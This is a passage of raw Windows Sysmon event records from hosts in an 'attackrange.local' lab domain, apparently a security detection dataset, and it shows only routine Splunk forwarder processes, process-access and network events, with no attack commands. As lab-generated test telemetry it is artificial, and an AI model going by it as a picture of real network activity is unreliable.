16:31:24.035{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-525C-6063-C422-00000000AF01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246243Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-525C-6063-C422-00000000AF01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061485Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BA6C98CE15DE9AD5A23D52B0039870,SHA256=550897E386CB50947E75E898D6191ECB632923EA5D5E2860D33485F800C1A285,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061484Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-525D-6063-3401-00000000AF01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061483Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061482Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061481Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061480Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061479Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-525D-6063-3401-00000000AF01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061478Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.843{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-525D-6063-3401-00000000AF01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061477Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.844{7F8C56E7-525D-6063-3401-00000000AF01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061476Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.280{7F8C56E7-525D-6063-3301-00000000AF01}44765760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061475Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-525D-6063-3301-00000000AF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061474Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061473Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061472Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061471Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061470Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-525D-6063-3301-00000000AF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061469Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.155{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-525D-6063-3301-00000000AF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061468Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:25.157{7F8C56E7-525D-6063-3301-00000000AF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246273Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:25.926{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D501D05DD319067677EB408D49116C2E,SHA256=2DA3AAEA38291F0AECE448532B278152689BB9753B676CB61FD794FABCBD505B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246272Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:25.894{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3DDED4CF1A2DE99A58ACC3CB2C6F8A,SHA256=493F0A7F4B8D9EF61E7F3E7550B2D7559A5407036961397FB9463FD2980EDB47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061486Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.974{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54835-false10.0.1.12-8000- 23542300x8000000000000000246274Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:26.894{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7DD0DA02EAB5E29315153E10BA8AB4A,SHA256=D22254DB9E438F9B3BF949C8E01499B76CFF33CE5426ED09AE020111075D2E5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061487Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:27.233{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9563437D61DB3BA710A1BC9900BCB971,SHA256=EEF855A85BF0D40E2CDEC6508006464705A026C7959E2AD0134680DB0D164881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246276Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:27.894{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B1AF67EA416BC84FF959CBE34A77B0F,SHA256=CA0EB49FF39BFD21B4A4D5AE99A39ED2157808A349D473B3DE5DBCED7EF1F45B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246275Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:25.640{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64804-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061488Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:28.640{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBB3F41F054C2279D839A580065F8E63,SHA256=35140BFB1738F00854C67054C7DE93C2CF772BBFECC78B182541D90915F74A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246277Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:28.910{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0838570C0A42CEC7CDED8E87CFBB668,SHA256=B482EA59ECB132D8AB922445E02644A3D5128AA5EB6FD712B6619026C7727A54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246278Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:29.926{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C281E463E76315A9D1864331C27D814,SHA256=ACF013EDA6E492F3060EEBE54516C72DEFE2D8A401B07C9DCE5A241717185439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061490Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:29.999{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A581BEB234F6CF28488F4E4291F34F5,SHA256=A979A15F80BF0EAC82A5EDAA45D357101689D721C1BBA880C947616BC2888F1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061489Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:29.999{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F6F68644BEDC188A826D089B7B79FF2,SHA256=A47BDB1DBFC05C9F449B4A0803D73596FF579976C1A29849628607BE423896D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246279Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:30.972{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B943DB39CA3BFB92F3EDDDBDDEDAC1F2,SHA256=3716BEC6188047B9888C2CB6356EE5FC64F0EEDB8F59F68FED4B5B6D55EBF466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061491Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:31.359{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA04582C2FA5D1FDFA4CAB3D175FD1A,SHA256=236558254419B831488BFEEEC708CCF3B9EA4CF6DB91DBCB12225ED8AE4FA3EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061492Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:32.718{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D5E492083D893DB056502B4ECAB22A,SHA256=E521C69AD0954BDC63CF223D0E73B82CC92CD9D6E022A2330FE4F59F3C7311A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246282Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:32.379{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program 